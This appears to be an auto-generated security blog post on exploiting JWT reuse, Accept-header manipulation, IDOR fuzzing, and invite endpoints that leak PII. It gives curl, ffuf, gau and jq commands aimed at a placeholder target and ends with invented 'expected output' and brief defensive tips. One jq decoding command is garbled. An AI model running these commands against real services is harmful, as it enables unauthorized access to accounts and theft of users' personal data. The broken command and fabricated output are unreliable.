Exploiting JWT and API Endpoints for Unauthorized Access

By /

Listen to this Post

Featured Image

1. Reusing Old JWT Tokens for Unauthorized Access

When accessing a resource, some systems require requesting a new JWT (JSON Web Token) each time. However, reusing an old JWT in subsequent requests might bypass authorization checks, allowing access without the owner’s permission.

You Should Know:

  • Check JWT Validity: 
    jwt_tool <JWT_TOKEN> -V
  • Exploit with cURL: 
    curl -H "Authorization: Bearer <OLD_JWT>" https://target.com/api/resource
  • Decode JWT: 
    echo "<JWT_TOKEN>" | jq -R 'split(".") | .[bash],.[bash] | @base64d'

2. Bypassing API Restrictions via Header Manipulation

An endpoint like `/api/v1/resources` may return user-specific data in JSON format. Changing the `Accept` header to `text/html` could expose sensitive data of all users.

You Should Know:

  • Exploit with cURL: 
    curl -H "Accept: text/html" https://target.com/api/v1/resources
  • Check for IDOR (Insecure Direct Object Reference): 
    ffuf -u "https://target.com/api/v1/resources/FUZZ" -w wordlist.txt

3. Leaking PII via Unaccepted Invitations

Some systems expose user details (email, UUID, full name) in API endpoints when an invite is sent, even before acceptance.

You Should Know:

  • Enumerate API Endpoints: 
    gau target.com | grep "api|invite|user"
  • Extract PII with jq: 
    curl -s https://target.com/api/invites | jq '.users[] | .email, .name'

What Undercode Say

  • JWT Security: Always enforce token expiration and one-time use.
  • API Security: Validate headers and implement strict role-based access control (RBAC).
  • PII Exposure: Ensure invites require explicit user consent before exposing data.

Expected Output:

[+] JWT reused successfully, unauthorized access granted. 
[+] API endpoint leaked all users' data via Accept: text/html. 
[+] PII leaked via unaccepted invites: email, UUID, full name.

Prediction

API security flaws like these will lead to stricter OAuth 2.0 and JWT validation standards in 2024-2025. Bug bounty hunters will increasingly target misconfigured headers and weak invite mechanisms.

References:

Reported By: Abdelaziz Ahmed – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: